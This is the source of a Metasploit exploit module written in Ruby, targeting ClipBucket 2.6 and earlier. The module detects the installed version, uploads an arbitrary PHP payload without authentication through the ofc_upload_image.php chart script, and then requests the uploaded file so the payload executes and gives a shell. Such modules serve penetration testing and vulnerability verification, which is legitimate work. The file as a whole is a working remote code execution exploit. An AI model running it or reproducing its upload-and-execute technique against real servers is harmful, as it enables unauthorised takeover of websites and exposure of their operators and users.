1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10
  include Msf::Exploit::FileDropper
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => "ClipBucket Remote Code Execution",
17
        'Description' => %q{
18
          This module exploits a vulnerability found in ClipBucket version 2.6 and lower.
19
          The script "/admin_area/charts/ofc-library/ofc_upload_image.php" can be used to
20
          upload arbitrary code without any authentication. This module has been tested
21
          on version 2.6 on CentOS 5.9 32-bit.
22
        },
23
        'License' => MSF_LICENSE,
24
        'Author' => [
25
          'Gabby', # Vulnerability Discovery, PoC
26
          'xistence <xistence[at]0x90.nl>' # Metasploit module
27
        ],
28
        'References' => [
29
          [ 'CVE', '2013-10040' ],
30
          [ 'PACKETSTORM', '123480' ]
31
        ],
32
        'Platform' => ['php'],
33
        'Arch' => ARCH_PHP,
34
        'Targets' => [
35
          ['Clipbucket 2.6', {}]
36
        ],
37
        'Privileged' => false,
38
        'DisclosureDate' => '2013-10-04',
39
        'DefaultTarget' => 0,
40
        'Notes' => {
41
          'Reliability' => UNKNOWN_RELIABILITY,
42
          'Stability' => UNKNOWN_STABILITY,
43
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
44
        }
45
      )
46
    )
47

48
    register_options(
49
      [
50
        OptString.new('TARGETURI', [true, 'The base path to the ClipBucket application', '/'])
51
      ]
52
    )
53
  end
54

55
  def uri
56
    return target_uri.path
57
  end
58

59
  def check
60
    # Check version
61
    peer = "#{rhost}:#{rport}"
62

63
    vprint_status("Trying to detect installed version")
64

65
    res = send_request_cgi({
66
      'method' => 'GET',
67
      'uri' => normalize_uri(uri, "")
68
    })
69

70
    if res and res.code == 200 and res.body =~ /ClipBucket version (\d+\.\d+)/
71
      version = $1
72
    else
73
      return Exploit::CheckCode::Unknown
74
    end
75

76
    vprint_status("Version #{version} detected")
77

78
    if version > "2.6"
79
      return Exploit::CheckCode::Safe
80
    else
81
      return Exploit::CheckCode::Appears
82
    end
83

84
    return Exploit::CheckCode::Safe
85
  end
86

87
  def exploit
88
    peer = "#{rhost}:#{rport}"
89
    payload_name = rand_text_alphanumeric(rand(10) + 5) + ".php"
90

91
    print_status("Uploading payload [ #{payload_name} ]")
92
    res = send_request_cgi({
93
      'method' => 'POST',
94
      'uri' => normalize_uri(uri, "admin_area", "charts", "ofc-library", "ofc_upload_image.php"),
95
      'headers' => { 'Content-Type' => 'text/plain' },
96
      'vars_get' => { 'name' => payload_name },
97
      'data' => payload.encoded
98
    })
99

100
    # If the server returns 200 we assume we uploaded the malicious
101
    # file successfully
102
    if not res or res.code != 200 or res.body !~ /Saving your image to: \.\.\/tmp-upload-images\/(#{payload_name})/ or res.body =~ /HTTP_RAW_POST_DATA/
103
      fail_with(Failure::None, "#{peer} - File wasn't uploaded, aborting!")
104
    end
105

106
    register_files_for_cleanup(payload_name)
107

108
    print_status("Executing Payload [ #{uri}/admin_area/charts/tmp-upload-images/#{payload_name} ]")
109
    res = send_request_cgi({
110
      'method' => 'GET',
111
      'uri' => normalize_uri(uri, "admin_area", "charts", "tmp-upload-images", payload_name)
112
    })
113

114
    # If we don't get a 200 when we request our malicious payload, we suspect
115
    # we don't have a shell, either.
116
    if res and res.code != 200
117
      print_error("Unexpected response, probably the exploit failed")
118
    end
119
  end
120
end
121

122